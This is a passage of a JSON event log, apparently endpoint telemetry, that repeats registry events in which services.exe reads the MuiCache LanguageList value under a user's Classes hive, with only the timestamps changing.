"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 